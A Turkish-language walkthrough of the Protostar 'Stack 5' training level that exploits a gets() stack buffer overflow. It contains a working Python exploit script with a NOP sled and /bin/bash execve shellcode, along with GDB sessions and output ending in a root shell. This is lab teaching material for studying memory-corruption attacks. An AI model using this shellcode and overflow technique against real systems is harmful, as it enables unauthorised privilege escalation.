📖 4 dakika ↪ Protostar

Stack 5

Stack5.c

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
 char buffer[64];

 gets(buffer);
}

Önceki seviyeden farkı burada zıplanabilecek herhanbgi bir fonksiyon yok!

Amaç: stack taşırılarak eip değerini stackten bir adresi gösterecek şekilde ayarlayıp shellcode çalıştırmak.

Programın Çalıştırılması

user@protostar:/opt/protostar/bin$ ./stack5

user@protostar:/opt/protostar/bin$ python -c "print 'A'*100" | ./stack5
Segmentation fault

Dönüş adresini tespit etmek

user@protostar:/opt/protostar/bin$ ./stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFF
Segmentation fault
user@protostar:/opt/protostar/bin$ dmesg | tail -1
[16102.708303] stack4[1893]: segfault at 45454545 ip 45454545 sp bffffce0 error 4

Programa yukarıdaki gibi uzun bir string verdikten sonra segmentation fault alıyoruz ve dmesg çıktısına baktığımızda ip registerinin 45454545 olduğunu görüyoruz.

GDB kullanarak aynı şekilde bu bilgiye ulaşılabilir.

user@protostar:/opt/protostar/bin$ gdb stack5 -q
Reading symbols from /opt/protostar/bin/stack5...done.
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
0x080483c4 <main+0>:  push  ebp
0x080483c5 <main+1>:  mov  ebp,esp
0x080483c7 <main+3>:  and  esp,0xfffffff0
0x080483ca <main+6>:  sub  esp,0x50
0x080483cd <main+9>:  lea  eax,[esp+0x10]
0x080483d1 <main+13>:  mov  DWORD PTR [esp],eax
0x080483d4 <main+16>:  call  0x80482e8 <gets@plt>
0x080483d9 <main+21>:  leave
0x080483da <main+22>:  ret
End of assembler dump.
(gdb) b *main+22
Breakpoint 1 at 0x80483da: file stack5/stack5.c, line 11.
(gdb) r
Starting program: /opt/protostar/bin/stack5
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFF

Breakpoint 1, 0x080483da in main (argc=Cannot access memory at address 0x4444444c
) at stack5/stack5.c:11
11   stack5/stack5.c: No such file or directory.
    in stack5/stack5.c
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x45454545 in ?? ()

Tabiki eip değiştirebilmek kod işletebilmek için yeterli değil. Stackte kod işletilebildiği durumlarda, eip’ye stackten bir adresi göstermesini sağlayabilirsek istediğimiz shell kodunu çalıştırabiliriz.

Stack adresini bulmak

Yukarıdaki oturumdan devam ederek registerlerin durumuna bakarsak eğer esp bize stack pointerin en üst noktasının adresini verecektir.

(gdb) i r
eax      0xbffff730    -1073744080
ecx      0xbffff730    -1073744080
edx      0xb7fd9334    -1208118476
ebx      0xb7fd7ff4    -1208123404
esp      0xbffff780    0xbffff780
ebp      0x44444444    0x44444444
esi      0x0   0
edi      0x0   0
eip      0x45454545    0x45454545
eflags     0x210246 [ PF ZF IF RF ID ]
cs       0x73   115
ss       0x7b   123
ds       0x7b   123
es       0x7b   123
fs       0x0   0
gs       0x33   51

Peki stackte nereye atlamalı

Stack’e bakacak olursak input olarak verdiğimiz A karakterlerini görebiliyoruz.

(gdb) x/64wx $esp-100
0xbffff71c:   0x080483d9   0xbffff730   0xb7ec6165   0xbffff738
0xbffff72c:   0xb7eada75   0x41414141   0x41414141   0x41414141
0xbffff73c:   0x41414141   0x41414141   0x41414141   0x41414141
0xbffff74c:   0x41414141   0x41414141   0x41414141   0x41414141
0xbffff75c:   0x41414141   0x41414141   0x41414141   0x41414141
0xbffff76c:   0x41414141   0x42424242   0x43434343   0x44444444
0xbffff77c:   0x45454545   0x46464646   0xbffff800   0xbffff82c
0xbffff78c:   0xb7fe1848   0xbffff7e0   0xffffffff   0xb7ffeff4
0xbffff79c:   0x08048232   0x00000001   0xbffff7e0   0xb7ff0626
0xbffff7ac:   0xb7fffab0   0xb7fe1b28   0xb7fd7ff4   0x00000000
0xbffff7bc:   0x00000000   0xbffff7f8   0x0b564e3d   0x2101382d
0xbffff7cc:   0x00000000   0x00000000   0x00000000   0x00000001
0xbffff7dc:   0x08048310   0x00000000   0xb7ff6210   0xb7eadb9b
0xbffff7ec:   0xb7ffeff4   0x00000001   0x08048310   0x00000000
0xbffff7fc:   0x08048331   0x080483c4   0x00000001   0xbffff824
0xbffff80c:   0x080483f0   0x080483e0   0xb7ff1040   0xbffff81c

\x45 leri değiştirerek eipyi kontrol edebiliyorduk. Stackte daha derinlere yazabiliyorsak o zaman shellcode’u eip’den bir sonraki adıma bırakır ve eip’yi kendinden bir sonraki adresi gösterecek şekilde ayarlayabilirsek programın devamında istediğimiz kodu çalıştırabiliriz.

Kod üzerinde anlaması daha kolay olacağından ufaktan script yazalım.

stack5.py

padding = "\x41"*76
eip   = "\xb8\xf7\xff\xbf"
nop   = "\x90"

trap = "\xCC"*4
print padding + eip + nop*40 + trap

Koddaki \x90 lar NOPcode olarak bilinen işlemcinin o süreyi boş geçmesini sağlayan işlemci komutudur. Kısaca bu adreslerden birini çalıştırmayı başlatabilirsek ileride çarpacağı herhangi bir komutu çalıştırmaya devam edecektir.

user@protostar:~$ python stack5.py | /opt/protostar/bin/stack5
Trace/breakpoint trap

Görüldüğü üzere \xCC bir işlemci tuzak kodudur. Debug işlemlerinde breakpoint’ler bu şekilde sağlanır.

Yukarıdaki kodda eip adresi, NOP kodlarının olduğu herhangi bir yer olabilir.

Root

Koddaki trapleri kaldırıp shellcode yerleştirdiğimiz zaman teorik olarak root shellimiz bizi bekliyor olacak.

padding = "\x41"*76
eip   = "\xb8\xf7\xff\xbf"
nop   = "\x90"

shellcode = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"

print padding + eip + nop*40 + shellcode
user@protostar:~$ python stack5.py | /opt/protostar/bin/stack5
user@protostar:~$ python stack5.py | /opt/protostar/bin/stack5
user@protostar:~$

Burada Linux’ta bulunan | işaretinden kaynaklı bir sorun var. Pipe soldaki programın çıktısını sağdaki programa input olarak veriyor böylelikle stack5 programına istediğimiz inputu istediğimiz şekilde verebiliyoruz. Fakat soldaki program; ekrana bufferi doldurup, eip adresini güncelleyip, bir sürü nop ekledikten sonra shellcode yazıp kapanıyor. Böylelikle biz stack5’te kod işletme hakkımız olmasına rağmen programdan çıkıyoruz.

Linuxta bulunan cat programı dosyaların içeriğini terminale basmakta kullanılabileceği gibi hiç bir argüman verilmemesi durumunda her satırı iki kere ekrana basar.

user@protostar:~$ cat
stack5 <- input
stack5 -> output

Python kodumuzu ve cat’i birleştirerek root kabuğu elde edilebilir.

user@protostar:~$ whoami
user
user@protostar:~$ whoami
user
user@protostar:~$ (python stack5.py;cat) | /opt/protostar/bin/stack5
whoami
root
id
uid=1001(user) gid=1001(user) euid=0(root) groups=0(root),1001(user)